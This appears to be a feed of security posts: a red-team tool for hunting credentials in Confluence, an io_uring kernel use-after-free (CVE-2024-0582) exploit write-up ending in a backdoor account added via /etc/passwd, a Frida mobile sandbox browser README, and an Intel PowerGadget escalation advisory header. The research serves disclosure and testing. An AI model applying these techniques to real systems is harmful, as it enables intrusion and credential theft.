
Introducing SharpConflux

Today, we are releasing a new tool called SharpConflux, a .NET application built to facilitate Confluence exploration. It allows Red Team operators to easily investigate Confluence instances with the goal of finding credential material and documentation relating to objectives without having to rely on SOCKS proxying.

SharpConflux is available for download from the GitHub repository below:

GitHub: https://github.com/nettitude/SharpConflux/

Background

Red Team operators typically interact with the target organisation’s network via an in-memory implant supported by a Command and Control (C2) framework such as Fortra’s Cobalt Strike, MDSec’s Nighthawk or Nettitude’s PoshC2. Direct access to the corporate network through a Virtual Private Network (VPN) or graphical access to a Virtual Desktop Infrastructure (VDI) host is unusual, meaning that in order to interact with internal corporate websites, operators must tunnel traffic from their systems to the internal network, through the in-memory implant.

Multiple tools exist for this purpose, such as SharpSocks and Cobalt Strike’s built-in socks command. However, this approach presents two problems:

  • First of all, it is troublesome to set up. While a seasoned operator will be able to do so in minutes, I have yet to meet a Red Teamer who enjoys the setup process or the laggy browsing experience. In fact, this tool was created as a result of a recent Red Team exercise during which none of the operators wanted to set up proxying to explore an internal Confluence instance.
  • Secondly, in order to provide a stable and usable experience, it forces operators to set the implant’s beaconing interval to a small value (almost always less than 100 milliseconds, and often 0 milliseconds). This significantly increases the number of HTTP requests transmitted over the existing C2 channel, creating abnormal volumes of traffic and therefore providing detection opportunities. Additionally, it prevents certain in-memory evasion techniques from functioning as expected (e.g. Cobalt Strike’s sleep masks), potentially leading to detection by the Endpoint Detection & Response (EDR) solution in place.

SharpConflux aims to bring Confluence exploration functionality to .NET, in a way that can be reliably and flexibly used through common C2 frameworks.

Confluence Introduction

Confluence is a data sharing platform developed by Atlassian, generally used by organisations as a corporate wiki.

Content is organised in spaces, which are intended to facilitate information sharing between teams (e.g. the IT department) or employees responsible for specific projects. Furthermore, users can set up their own personal spaces, to which they can upload public or private data.

Within these spaces, users can publish and edit web pages and blog posts through a web-based editor, and attach any relevant files to them. Additionally, users can add comments to pages and blog posts.

The diagram below, which has been extracted from Confluence’s support page, better illustrates the structure used by the platform:

The hierarchy of content in Confluence

From a Red Teamer’s perspective, Confluence is particularly useful in two scenarios:

  • During early stages of the operation, as all sorts of credentials can typically be found in Confluence. These may facilitate privilege escalation and lateral movement activities.
  • To discover documentation, hostnames and even credential material relating to the objective systems, which are usually targeted after achieving high levels of privileges and therefore, in late stages of the cyber kill chain.

Confluence Instance Types and Authentication

Atlassian offers three Confluence hosting options to fit different organisations’ requirements:

  • Confluence Cloud instances are maintained by Atlassian and hosted on their own AWS tenants. This is the preferred option for newer Atlassian clients. Confluence Cloud instances are accessed as a subdomain of atlassian.net. For instance, https://companysubdomain.atlassian.net/wiki/.
  • Confluence Server and Confluence Data Center instances are maintained by the relevant organisation and are therefore hosted on its own servers. This can be completely on-premise, or in any cloud tenant managed by the organisation (e.g. Azure, AWS, GCP). Both instance types are similar, but Data Center includes additional features. It should be noted that Atlassian has decided to discontinue Confluence Server, with support ending in February 2024. However, it still plans to support Confluence Data Center for the foreseeable future. These instance types run on TCP port 8090 by default and can typically be accessed through an internal FQDN (e.g. http://myconfluence.internal.local:8090). For the purpose of this tool, Confluence Server and Confluence Data Center are considered equivalent.

Even though a lot of organisations are migrating to Confluence Cloud, a significant proportion of them still use on-premise Confluence instances. In fact, it is not uncommon to find companies that have already made the move to Cloud but still maintain on-premise instances for specific internal projects, platforms or departments.

Certain attributes and API endpoints differ slightly between Cloud and Server / Data Center instances. More importantly, authentication methods are significantly different. SharpConflux has been developed with compatibility in mind, supporting a variety of authentication methods across the different instance types.

The most relevant authentication methods are described below.

Confluence Cloud: Email address + password authentication

Users can authenticate to Confluence Cloud instances using an email address and password combination. Upon browsing https://companysubdomain.atlassian.net/wiki/, unauthenticated users are redirected to https://id.atlassian.com/login, where the following form data is posted:

{
   "username":"EMAILVALUE",
   "password":"PASSWORDVALUE",
   "state":
   {
      "csrfToken":"CSRFTOKENVALUE",
      "anonymousId":"ANONYMOUSIDVALUE"
   },
   "token":"TOKENVALUE"
}

If the credentials provided in the username and password parameters are correct, and the csrfToken and token values are valid, the server will return a redirect URI. Subsequently accessing this URI will cause the server to set the cloud.session.token session cookie.

This authentication method is not supported by SharpConflux. From an adversarial perspective, firms very rarely rely on this authentication mechanism, as most will be using SAML SSO authentication for Cloud instances.

Confluence Cloud: Email address + API token

Users can create and manage their own API tokens by visiting https://id.atlassian.com/manage-profile/security/api-tokens:

In order to authenticate, the user’s email address and API token are submitted through the Authorization: Basic header in each HTTP request.

This authentication method is supported by SharpConflux. However, gathering valid API tokens is a rare occurrence.

Confluence Cloud: Third Party and SAML SSO

Confluence Cloud allows users to log in with third party (e.g. Apple, Google, Microsoft, Slack) accounts. Typically, firms will configure Confluence Cloud instances to authenticate through Active Directory Federation Services (ADFS) or Azure AD.

Once the SAML exchange is completed, the server will return a redirect URI to https://id.atlassian.com/login/authorize. Subsequently accessing this URI will cause the server to set the cloud.session.token session cookie.

As of the time of release, this authentication method is not supported by SharpConflux. Whilst this is the most commonly deployed authentication method by organisations relying on Confluence Cloud, it is also frequent for them to enforce Multi-Factor Authentication (MFA), making cookie-based authentication a much more interesting method from an adversarial perspective.

Confluence Cloud: Cookie-based Authentication

If you have managed to dump Confluence Cloud cookies (e.g. via DPAPI), you can use SharpConflux to authenticate to the target instance. Please note that including a single valid cloud.session.token or tenant.session.token cookie should be sufficient to authenticate, but you can specify any number of cookies if you prefer.

Confluence Server / Data Center: Username + password (Basic authentication)

By default, Confluence Server / Data Center installations support username + password authentication through the Authorization: Basic HTTP request header. However, Basic authentication can be disabled by the target organisation through the “Allow basic authentication on API calls” setting:

This authentication method is supported by SharpConflux. From an adversarial perspective, finding a username and password combination for an on-premise Confluence instance is one of the most common scenarios.

Confluence Server / Data Center: Username + password (via form data)

Users can visit the on-premise Confluence website (e.g. http://myconfluence.internal.local:8090) and log in using a valid username and password combination. The following HTTP POST request will be sent as a result:

POST /dologin.action HTTP/1.1
[...]

os_username=USERNAMEVALUE&os_password=PASSWORDVALUE&login=Log+in&os_destination=%2Findex.action

If the provided credentials within the os_username and os_password parameters are correct, the server will set the JSESSIONID session cookie.

This authentication method is supported by SharpConflux. Similarly to the previous method, finding a username and password combination is one of the most common scenarios. Please note that this authentication method will still work even if the “Allow basic authentication on API calls” setting is disabled.

Confluence Server / Data Center: Personal Access Token (PAT)

On Confluence Server / Data Center installations, users are allowed to create and manage their own Personal Access Tokens (PATs), which will match their current permission level. PATs can be created from /plugins/personalaccesstokens/usertokens.action:

In order to authenticate, the PAT is submitted through the Authorization: Bearer header in each HTTP request.

While this authentication method is supported by SharpConflux, it has only been added for completeness and to support edge cases, as I have never come across a PAT.

Confluence Server / Data Center: SSO

Similarly to Confluence Cloud instances, Confluence Server / Data Center variations support authentication through various Identity Providers (IdP) including ADFS, Azure AD, Bitium, Okta, OneLogin and PingIdentity. However, in this case, it is uncommon to find on-premise Confluence instances making use of SSO. For this reason, this authentication method is not supported by SharpConflux as of the time of release.

Confluence Server / Data Center: Cookie-based authentication

If you have managed to dump Confluence Server / Data Center cookies (e.g. via DPAPI), you can use SharpConflux to authenticate to the target instance. Please note that including a single valid JSESSIONID or seraph.confluence cookie should be sufficient to authenticate, but you can specify any number of cookies if you prefer.

Summary

Confluence is the most widely used corporate wiki platform, often storing sensitive data that can greatly facilitate privilege escalation and lateral movement activities. Whilst this blog post has not uncovered any new attack techniques, the release of SharpConflux aims to help Red Team operators by providing an easy way to interact with all types of Confluence instances.

SharpConflux has been tested against the latest supported versions as of the time of development (Cloud 8.3.2, Data Center 7.19.10 LTS and Data Center 8.3.2). A complete list of features, usage guidelines and examples can be found in the referenced GitHub project.

GitHub: https://github.com/nettitude/SharpConflux/

 

The post Introducing SharpConflux appeared first on LRQA Nettitude Labs.

Mind the Patch Gap: Exploiting an io_uring Vulnerability in Ubuntu

By Oriol Castejón

Overview

This post discusses a use-after-free vulnerability, CVE-2024-0582, in io_uring in the Linux kernel. Despite the vulnerability being patched in the stable kernel in December 2023, the fix was not ported to Ubuntu kernels for over two months, making it an easy 0day vector in Ubuntu during that time.

In early January 2024, a Project Zero issue for a recently fixed io_uring use-after-free (UAF) vulnerability (CVE-2024-0582) was made public. It was apparent that the vulnerability allowed an attacker to obtain read and write access to a number of previously freed pages. This seemed to be a very powerful primitive: usually a UAF gets you access to a freed kernel object, not a whole page – or even better, multiple pages. As the Project Zero issue also described, it was clear that this vulnerability should be easily exploitable: if an attacker has total access to free pages, once these pages are returned to a slab cache to be reused, they will be able to modify any contents of any object allocated within these pages. In the more common situation, the attacker can modify only a certain type of object, and possibly only at certain offsets or with certain values.

Moreover, this fact also suggests that a data-only exploit should be possible. In general terms, such an exploit does not rely on modifying the code execution flow, by building for instance a ROP chain or using similar techniques. Instead, it focuses on modifying certain data that ultimately grants the attacker root privileges, such as making read-only files writable by the attacker. This approach makes exploitation more reliable, stable, and allows bypassing some exploit mitigations such as Control-Flow Integrity (CFI), as the instructions executed by the kernel are not altered in any way.

Finally, according to the Project Zero issue, this vulnerability was present in the Linux kernel from version 6.4 and prior to version 6.7. At that moment, Ubuntu 23.10 was running a vulnerable version of 6.5 (and somewhat later, so was Ubuntu 22.04 LTS), so it was a good opportunity to exploit the patch gap, understand how easy it would be for an attacker to do so, and how long they might possess a 0day exploit based on an Nday.

More precisely:

This post describes the data-only exploit strategy that we implemented, allowing a non-privileged user (and without the need for unprivileged user namespaces) to achieve root privileges on affected systems. First, a general overview of the io_uring interface is given, as well as some more specific details of the interface relevant to this vulnerability. Next, an analysis of the vulnerability is provided. Finally, a strategy for a data-only exploit is presented.

Preliminaries

The io_uring interface is an asynchronous I/O API for Linux created by Jens Axboe and introduced in the Linux kernel version 5.1. Its goal is to improve the performance of applications with a high number of I/O operations. It provides interfaces similar to functions like read() and write(), for example, but requests are satisfied asynchronously to avoid the context-switching overhead caused by blocking system calls.

The io_uring interface has been a bountiful target for a lot of vulnerability research; it was disabled in ChromeOS and on production Google servers, and restricted in Android. As such, there are many blog posts that explain it in great detail. Some relevant references are the following:

In the next subsections we give an overview of the io_uring interface. We pay special attention to the Provided Buffer Ring functionality, which is relevant to the vulnerability discussed in this post. The reader can also check “What is io_uring?”, as well as the above references for alternative overviews of this subsystem.

The io_uring Interface

The basis of io_uring is a set of two ring buffers used for communication between user and kernel space. These are:

  • The submission queue (SQ), which contains submission queue entries (SQEs) describing a request for an I/O operation, such as reading or writing to a file, etc.
  • The completion queue (CQ), which contains completion queue entries (CQEs) that correspond to SQEs that have been processed and completed.

This model allows a number of I/O requests to be performed asynchronously using a single system call, while in a synchronous model each request would typically correspond to a single system call. This reduces the overhead caused by blocking system calls, thus improving performance. Moreover, the use of shared ring buffers also reduces overhead, as no data has to be copied between user and kernel space.

The io_uring API consists of three system calls:

  • io_uring_setup()
  • io_uring_register()
  • io_uring_enter()

The io_uring_setup() System Call

The io_uring_setup() system call sets up a context for an io_uring instance, that is, a submission and a completion queue with the indicated number of entries each one. Its prototype is the following:

int io_uring_setup(u32 entries, struct io_uring_params *p);

Its arguments are:

  • entries: It determines how many elements the SQ and CQ must have at the minimum.
  • params: It can be used by the application to pass options to the kernel, and by the kernel to pass information to the application about the ring buffers.

On success, the return value of this system call is a file descriptor that can later be used to perform operations on the io_uring instance.

The io_uring_register() System Call

The io_uring_register() system call allows registering resources, such as user buffers, files, etc., for use in an io_uring instance. Registering such resources makes the kernel map them, avoiding future copies to and from userspace, thus improving performance. Its prototype is the following:

int io_uring_register(unsigned int fd, unsigned int opcode, void *arg, unsigned int nr_args);

Its arguments are:

  • fd: The io_uring file descriptor returned by the io_uring_setup() system call.
  • opcode: The specific operation to be executed. It can have certain values such as IORING_REGISTER_BUFFERS, to register user buffers, or IORING_UNREGISTER_BUFFERS, to release the previously registered buffers.
  • arg: Arguments passed to the operation being executed. Their type depends on the specific opcode being passed.
  • nr_args: Number of arguments in arg being passed.

On success, the return value of this system call is either zero or a positive value, depending on the opcode used.

Provided Buffer Rings

An application might need to have different types of registered buffers for different I/O requests. Since kernel version 5.7, to facilitate managing these different sets of buffers, io_uring allows the application to register a pool of buffers that are identified by a group ID. This is done using the IORING_REGISTER_PBUF_RING opcode in the io_uring_register() system call.

More precisely, the application starts by allocating a set of buffers that it wants to register. Then, it makes the io_uring_register() system call with opcode IORING_REGISTER_PBUF_RING, specifying a group ID with which these buffers should be associated, a start address of the buffers, the length of each buffer, the number of buffers, and a starting buffer ID. This can be done for multiple sets of buffers, each one having a different group ID.

Finally, when submitting a request, the application can use the IOSQE_BUFFER_SELECT flag and provide the desired group ID to indicate that a provided buffer ring from the corresponding set should be used. When the operation has been completed, the buffer ID of the buffer used for the operation is passed to the application via the corresponding CQE.

Provided buffer rings can be unregistered via the io_uring_register() system call using the IORING_UNREGISTER_PBUF_RING opcode.

User-mapped Provided Buffer Rings

In addition to the buffers allocated by the application, since kernel version 6.4, io_uring allows a user to delegate the allocation of provided buffer rings to the kernel. This is done using the IOU_PBUF_RING_MMAP flag passed as an argument to io_uring_register(). In this case, the application does not need to previously allocate these buffers, and therefore the start address of the buffers does not have to be passed to the system call. Then, after io_uring_register() returns, the application can mmap() the buffers into userspace with the offset set as:

IORING_OFF_PBUF_RING | (bgid << IORING_OFF_PBUF_SHIFT)

where bgid is the corresponding group ID. These offsets, as well as others used to mmap() the io_uring data, are defined in include/uapi/linux/io_uring.h:

/*
 * Magic offsets for the application to mmap the data it needs
 */
#define IORING_OFF_SQ_RING		0ULL
#define IORING_OFF_CQ_RING		0x8000000ULL
#define IORING_OFF_SQES			0x10000000ULL
#define IORING_OFF_PBUF_RING		0x80000000ULL
#define IORING_OFF_PBUF_SHIFT		16
#define IORING_OFF_MMAP_MASK		0xf8000000ULL

The function that handles such an mmap() call is io_uring_mmap():

// Source: https://elixir.bootlin.com/linux/v6.5.3/source/io_uring/io_uring.c#L3439

static __cold int io_uring_mmap(struct file *file, struct vm_area_struct *vma)
{
	size_t sz = vma->vm_end - vma->vm_start;
	unsigned long pfn;
	void *ptr;

	ptr = io_uring_validate_mmap_request(file, vma->vm_pgoff, sz);
	if (IS_ERR(ptr))
		return PTR_ERR(ptr);

	pfn = virt_to_phys(ptr) >> PAGE_SHIFT;
	return remap_pfn_range(vma, vma->vm_start, pfn, sz, vma->vm_page_prot);
}

Note that remap_pfn_range() ultimately creates a mapping with the VM_PFNMAP flag set, which means that the MM subsystem will treat the base pages as raw page frame number mappings without an associated page structure. In particular, the core kernel will not keep reference counts of these pages, and keeping track of them is the responsibility of the calling code (in this case, the io_uring subsystem).

The io_uring_enter() System Call

The io_uring_enter() system call is used to initiate and complete I/O using the SQ and CQ that have been previously set up via the io_uring_setup() system call. Its prototype is the following:

int io_uring_enter(unsigned int fd, unsigned int to_submit, unsigned int min_complete, unsigned int flags, sigset_t *sig);

Its arguments are:

  • fd: The io_uring file descriptor returned by the io_uring_setup() system call.
  • to_submit: Specifies the number of I/Os to submit from the SQ.
  • min_complete: Specifies the number of completion events to wait for before returning, when the IORING_ENTER_GETEVENTS flag is set.
  • flags: A bitmask value that allows specifying certain options, such as IORING_ENTER_GETEVENTS, IORING_ENTER_SQ_WAKEUP, IORING_ENTER_SQ_WAIT, etc.
  • sig: A pointer to a signal mask. If it is not NULL, the system call replaces the current signal mask by the one pointed to by sig, and when events become available in the CQ restores the original signal mask.

Vulnerability

The vulnerability can be triggered when an application registers a provided buffer ring with the IOU_PBUF_RING_MMAP flag. In this case, the kernel allocates the memory for the provided buffer ring, instead of it being done by the application. To access the buffers, the application has to mmap() them to get a virtual mapping. If the application later unregisters the provided buffer ring using the IORING_UNREGISTER_PBUF_RING opcode, the kernel frees this memory and returns it to the page allocator. However, it does not have any mechanism to check whether the memory has been previously unmapped in userspace. If this has not been done, the application has a valid memory mapping to freed pages that can be reallocated by the kernel for other purposes. From this point, reading or writing to these pages will trigger a use-after-free.

The following code blocks show the affected parts of the functions relevant to this vulnerability. Code snippets are demarcated by reference markers denoted by [N]. Lines not relevant to this vulnerability are replaced by a [Truncated] marker. The code corresponds to Linux kernel version 6.5.3, the version on which the Ubuntu kernel 6.5.0-15-generic is based.

Registering User-mapped Provided Buffer Rings

The handler of the IORING_REGISTER_PBUF_RING opcode for the io_uring_register() system call is the io_register_pbuf_ring() function, shown in the next listing.

// Source: https://elixir.bootlin.com/linux/v6.5.3/source/io_uring/kbuf.c#L537

int io_register_pbuf_ring(struct io_ring_ctx *ctx, void __user *arg)
{
	struct io_uring_buf_reg reg;
	struct io_buffer_list *bl, *free_bl = NULL;
	int ret;

[1]

	if (copy_from_user(&reg, arg, sizeof(reg)))
		return -EFAULT;

[Truncated]

	if (!is_power_of_2(reg.ring_entries))
		return -EINVAL;

[2]

	/* cannot disambiguate full vs empty due to head/tail size */
	if (reg.ring_entries >= 65536)
		return -EINVAL;

	if (unlikely(reg.bgid < BGID_ARRAY && !ctx->io_bl)) {
		int ret = io_init_bl_list(ctx);
		if (ret)
			return ret;
	}

	bl = io_buffer_get_list(ctx, reg.bgid);
	if (bl) {
		/* if mapped buffer ring OR classic exists, don't allow */
		if (bl->is_mapped || !list_empty(&bl->buf_list))
			return -EEXIST;
	} else {

[3]

		free_bl = bl = kzalloc(sizeof(*bl), GFP_KERNEL);
		if (!bl)
			return -ENOMEM;
	}

[4]

	if (!(reg.flags & IOU_PBUF_RING_MMAP))
		ret = io_pin_pbuf_ring(&reg, bl);
	else
		ret = io_alloc_pbuf_ring(&reg, bl);

[Truncated]

	return ret;
}

The function starts by copying the provided arguments into an io_uring_buf_reg structure reg [1]. Then, it checks that the desired number of entries is a power of two and is strictly less than 65536 [2]. Note that this implies that the maximum number of allowed entries is 32768.

Next, it checks whether a provided buffer list with the specified group ID reg.bgid exists and, in case it does not, an io_buffer_list structure is allocated and its address is stored in the variable bl [3]. Finally, if the provided arguments have the flag IOU_PBUF_RING_MMAP set, the io_alloc_pbuf_ring() function is called [4], passing in the address of the structure reg, which contains the arguments passed to the system call, and the pointer to the allocated buffer list structure bl.

// Source: https://elixir.bootlin.com/linux/v6.5.3/source/io_uring/kbuf.c#L519

static int io_alloc_pbuf_ring(struct io_uring_buf_reg *reg,
			      struct io_buffer_list *bl)
{
	gfp_t gfp = GFP_KERNEL_ACCOUNT | __GFP_ZERO | __GFP_NOWARN | __GFP_COMP;
	size_t ring_size;
	void *ptr;

[5]

	ring_size = reg->ring_entries * sizeof(struct io_uring_buf_ring);

[6]

	ptr = (void *) __get_free_pages(gfp, get_order(ring_size));
	if (!ptr)
		return -ENOMEM;

[7]

	bl->buf_ring = ptr;
	bl->is_mapped = 1;
	bl->is_mmap = 1;
	return 0;
}

The io_alloc_pbuf_ring() function takes the number of ring entries specified in reg->ring_entries and computes the resulting size ring_size by multiplying it by the size of the io_uring_buf_ring structure [5], which is 16 bytes. Then, it requests a number of pages from the page allocator that can fit this size via a call to __get_free_pages() [6]. Note that for the maximum number of allowed ring entries, 32768, ring_size is 524288 and thus the maximum number of 4096-byte pages that can be retrieved is 128. The address of the first page is then stored in the io_buffer_list structure, more precisely in bl->buf_ring [7]. Also, bl->is_mapped and bl->is_mmap are set to 1.

Unregistering Provided Buffer Rings

The handler of the IORING_UNREGISTER_PBUF_RING opcode for the io_uring_register() system call is the io_unregister_pbuf_ring() function, shown in the next listing.

// Source: https://elixir.bootlin.com/linux/v6.5.3/source/io_uring/kbuf.c#L601

int io_unregister_pbuf_ring(struct io_ring_ctx *ctx, void __user *arg)
{
	struct io_uring_buf_reg reg;
	struct io_buffer_list *bl;

[8]

	if (copy_from_user(&reg, arg, sizeof(reg)))
		return -EFAULT;
	if (reg.resv[0] || reg.resv[1] || reg.resv[2])
		return -EINVAL;
	if (reg.flags)
		return -EINVAL;

[9]

	bl = io_buffer_get_list(ctx, reg.bgid);
	if (!bl)
		return -ENOENT;
	if (!bl->is_mapped)
		return -EINVAL;

[10]

	__io_remove_buffers(ctx, bl, -1U);
	if (bl->bgid >= BGID_ARRAY) {
		xa_erase(&ctx->io_bl_xa, bl->bgid);
		kfree(bl);
	}
	return 0;
}

Again, the function starts by copying the provided arguments into an io_uring_buf_reg structure reg [8]. Then, it retrieves the provided buffer list corresponding to the group ID specified in reg.bgid and stores its address in the variable bl [9]. Finally, it passes bl to the function __io_remove_buffers() [10].

// Source: https://elixir.bootlin.com/linux/v6.5.3/source/io_uring/kbuf.c#L209

static int __io_remove_buffers(struct io_ring_ctx *ctx,
			       struct io_buffer_list *bl, unsigned nbufs)
{
	unsigned i = 0;

	/* shouldn't happen */
	if (!nbufs)
		return 0;

	if (bl->is_mapped) {
		i = bl->buf_ring->tail - bl->head;
		if (bl->is_mmap) {
			struct page *page;

[11]

			page = virt_to_head_page(bl->buf_ring);

[12]

			if (put_page_testzero(page))
				free_compound_page(page);
			bl->buf_ring = NULL;
			bl->is_mmap = 0;
		} else if (bl->buf_nr_pages) {

[Truncated]

In case the buffer list structure has the is_mapped and is_mmap flags set, which is the case when the buffer ring was registered with the IOU_PBUF_RING_MMAP flag [7], the function reaches [11]. There, the page structure of the head page corresponding to the virtual address of the buffer ring bl->buf_ring is obtained. Finally, all the pages forming the compound page led by this head page are freed at [12], thus returning them to the page allocator.

Note that if the provided buffer ring is set up with IOU_PBUF_RING_MMAP, that is, it has been allocated by the kernel and not the application, the userspace application is expected to have previously mmap()ed this memory. Moreover, recall that since the memory mapping was created with the VM_PFNMAP flag, the reference count of the page structure was not modified during this operation. In other words, in the code above there is no way for the kernel to know whether the application has unmapped the memory before freeing it via the call to free_compound_page(). If this has not happened, a use-after-free can be triggered by the application by just reading or writing to this memory.

Exploitation

The exploitation mechanism presented in this post relies on how memory allocation works on Linux, so the reader is expected to have some familiarity with it. As a refresher, we highlight the following facts:

  • The page allocator is in charge of managing memory pages, which are usually 4096 bytes. It keeps lists of free pages of order n, that is, memory chunks of page size multiplied by 2^n. These pages are served on a first-in-first-out basis.
  • The slab allocator sits on top of the buddy allocator and keeps caches of commonly used objects (dedicated caches) or fixed-size objects (generic caches), called slab caches, available for allocation in the kernel. There are several implementations of slab allocators, but for the purpose of this post only the SLUB allocator, the default in modern versions of the kernel, is relevant.
  • Slab caches are formed by multiple slabs, which are sets of one or more contiguous pages of memory. When a slab cache runs out of free slabs, which can happen if a large number of objects of the same type or size are allocated and not freed during a period of time, the operating system allocates a new slab by requesting free pages to the page allocator.

One such slab cache is filp, which contains file structures. A file structure, shown in the next listing, represents an open file.

// Source: https://elixir.bootlin.com/linux/v6.5.3/source/include/linux/fs.h#L961

struct file {
	union {
		struct llist_node	f_llist;
		struct rcu_head 	f_rcuhead;
		unsigned int 		f_iocb_flags;
	};

	/*
	 * Protects f_ep, f_flags.
	 * Must not be taken from IRQ context.
	 */
	spinlock_t		f_lock;
	fmode_t			f_mode;
	atomic_long_t		f_count;
	struct mutex		f_pos_lock;
	loff_t			f_pos;
	unsigned int		f_flags;
	struct fown_struct	f_owner;
	const struct cred	*f_cred;
	struct file_ra_state	f_ra;
	struct path		f_path;
	struct inode		*f_inode;	/* cached value */
	const struct file_operations	*f_op;

	u64			f_version;
#ifdef CONFIG_SECURITY
	void			*f_security;
#endif
	/* needed for tty driver, and maybe others */
	void			*private_data;

#ifdef CONFIG_EPOLL
	/* Used by fs/eventpoll.c to link all the hooks to this file */
	struct hlist_head	*f_ep;
#endif /* #ifdef CONFIG_EPOLL */
	struct address_space	*f_mapping;
	errseq_t		f_wb_err;
	errseq_t		f_sb_err; /* for syncfs */
} __randomize_layout
  __attribute__((aligned(4)));	/* lest something weird decides that 2 is OK */

The most relevant fields for this exploit are the following:

  • f_mode: Determines whether the file is readable or writable.
  • f_pos: Determines the current reading or writing position.
  • f_op: The operations associated with the file. It determines the functions to be executed when certain system calls such as read(), write(), etc., are issued on the file. For files in ext4 filesystems, this is equal to the ext4_file_operations variable.

Strategy for a Data-Only Exploit

The exploit primitive provides the attacker with read and write access to a certain number of free pages that have been returned to the page allocator. By opening a file a large number of times, the attacker can force the exhaustion of all the slabs in the filp cache, so that free pages are requested from the page allocator to create a new slab in this cache. From then on, further allocations of file structures will land in pages to which the attacker has read and write access, allowing the attacker to modify them. For example, by modifying the f_mode field, the attacker can make a file that was opened with read-only permissions writable.

This strategy was implemented to successfully exploit the following versions of Ubuntu:

  • Ubuntu 22.04 Jammy Jellyfish LTS with kernel 6.5.0-15-generic.
  • Ubuntu 22.04 Jammy Jellyfish LTS with kernel 6.5.0-17-generic.
  • Ubuntu 23.10 Mantic Minotaur with kernel 6.5.0-15-generic.
  • Ubuntu 23.10 Mantic Minotaur with kernel 6.5.0-17-generic.

The next subsections give more details on how this strategy can be carried out.

Triggering the Vulnerability

The strategy begins by triggering the vulnerability to obtain read and write access to freed pages. This can be done by executing the following steps:

  • Making an io_uring_setup() system call to set up the io_uring instance.
  • Making an io_uring_register() system call with opcode IORING_REGISTER_PBUF_RING and the IOU_PBUF_RING_MMAP flag, so that the kernel itself allocates the memory for the provided buffer ring.
Registering a provided buffer ring
  • mmap()ing the memory of the provided buffer ring with read and write permissions, using the io_uring file descriptor and the offset IORING_OFF_PBUF_RING.
MMap the buffer ring
  • Unregistering the provided buffer ring by making an io_uring_register() system call with opcode IORING_UNREGISTER_PBUF_RING.
Unregistering the buffer ring

At this point, the pages corresponding to the provided buffer ring have been returned to the page allocator, while the attacker still has a valid reference to them.

Spraying File Structures

The next step is spawning a large number of child processes, each one opening the file /etc/passwd many times with read-only permissions. This forces the allocation of corresponding file structures in the kernel.

Spraying file structures

By opening a large number of files, the attacker can force the exhaustion of the slabs in the filp cache. After that, new slabs will be allocated by requesting free pages from the page allocator. At some point, the pages that previously corresponded to the provided buffer ring, and to which the attacker still has read and write access, will be returned by the page allocator.

Requesting free pages from the page allocator

Hence, all of the file structures created after this point will be allocated in the attacker-controlled memory region, giving the attacker the ability to modify them.

Allocating file structures within a controlled page

Note that these child processes have to wait until indicated to proceed in the last stage of the exploit, so that the files are kept open and their corresponding structures are not freed.

Locating a File Structure in Memory

Although the attacker may have access to some slabs belonging to the filp cache, they don’t know where those slabs lie within the memory region. To identify them, the attacker can search for the ext4_file_operations address at the offset of the file.f_op field within the file structure. When one is found, it can be safely assumed to correspond to the file structure of one instance of the previously opened /etc/passwd file.

Note that even when Kernel Address Space Layout Randomization (KASLR) is enabled, to identify the ext4_file_operations address in memory it is only necessary to know the offset of this symbol with respect to the _text symbol, so there is no need for a KASLR bypass. Indeed, given a value val of an unsigned integer found in memory at the corresponding offset, one can safely assume that it is the address of ext4_file_operations if:

  • (val >> 32 & 0xffffffff) == 0xffffffff, i.e. the 32 most significant bits are all 1.
  • (val & 0xfffff) == (ext4_fops_offset & 0xfffff), i.e. the 20 least significant bits of val and ext4_fops_offset, the offset of ext4_file_operations with respect to _text, are the same.

Changing File Permissions and Adding a Backdoor Account

Once a file structure corresponding to the /etc/passwd file is located in the memory region accessible by the attacker, it can be modified at will. In particular, setting the FMODE_WRITE and FMODE_CAN_WRITE flags in the file.f_mode field of the found structure will make the /etc/passwd file writable when using the corresponding file descriptor.

Moreover, by setting the file.f_pos field of the found file structure to the current size of the /etc/passwd file, the attacker can ensure that any data written to it is appended at the end of the file.

To finish, the attacker can signal all the child processes spawned in the second stage to try to write to the opened /etc/passwd file. While most of these attempts will fail, as the file was opened with read-only permissions, the one using the modified file structure, which now has write permissions due to the modification of the file->f_mode field, will succeed.

Conclusion

To sum up, in this post we described a use-after-free vulnerability that was recently disclosed in the io_uring subsystem of the Linux kernel, and presented a data-only exploit strategy for it. The strategy was relatively simple to implement, proved very reliable during our tests and, when it failed, did not affect the stability of the system. It allowed us to exploit up-to-date versions of Ubuntu during the patch gap window of about two months.

About Exodus Intelligence

Our world-class team of vulnerability researchers discover hundreds of exclusive Zero-Day vulnerabilities, providing our clients with proprietary knowledge before the adversaries find them. We also conduct N-Day research, where we select critical N-Day vulnerabilities and complete research to prove whether these vulnerabilities are truly exploitable in the wild.

For more information on our products and how we can help your vulnerability efforts, visit www.exodusintel.com or contact [email protected] for further discussion.

The post Mind the Patch Gap: Exploiting an io_uring Vulnerability in Ubuntu appeared first on Exodus Intelligence.

Noia - Simple Mobile Applications Sandbox File Browser Tool


Noia is a web-based tool whose main aim is to ease the process of browsing mobile applications' sandboxes and directly previewing SQLite databases, images, and more. Powered by frida.re.

Please note that I'm not a programmer, but I'm probably above the median in code-savviness. Try it out, open an issue if you find any problems. PRs are welcome.


Installation & Usage

npm install -g noia
noia

Features

  • Explore third-party applications' files and directories. Noia shows you details including the access permissions, file type and much more.

  • View custom binary files. Directly preview SQLite databases, images, and more.

  • Search application by name.

  • Search files and directories by name.

  • Navigate to a custom directory using the ctrl+g shortcut.

  • Download the application files and directories for further analysis.

  • Basic iOS support

and more


Setup

Desktop requirements:

  • node.js LTS and npm
  • Any decent modern desktop browser

Noia is available on npm, so just type the following command to install it and run it:

npm install -g noia
noia

Device setup:

Noia is powered by frida.re, thus requires Frida to run.

Rooted Device

See:

  • https://frida.re/docs/android/
  • https://frida.re/docs/ios/

Non-rooted Device

  • https://koz.io/using-frida-on-android-without-root/
  • https://github.com/sensepost/objection/wiki/Patching-Android-Applications
  • https://nowsecure.com/blog/2020/01/02/how-to-conduct-jailed-testing-with-frida/

Security Warning

This tool is not secure and may contain security vulnerabilities, so make sure to isolate the web page from untrusted networks.

LICENCE

MIT



Intel PowerGadget 3.6 Local Privilege Escalation

Vulnerability summary: Local Privilege Escalation from regular user to SYSTEM, via conhost.exe hijacking triggered by MSI installer in repair mode
Affected Products: Intel PowerGadget
Affected Versions: tested on PowerGadget_3.6.msi (a3834b2559c18e6797ba945d685bf174), file signed on Monday, February 1, 2021 9:43:20 PM (this seems to be the latest version); earlier versions might be affected as well.
Affected Platforms: Windows
Common Vulnerability Scoring System (CVSS) Base Score (CVSSv3): 7.8 HIGH
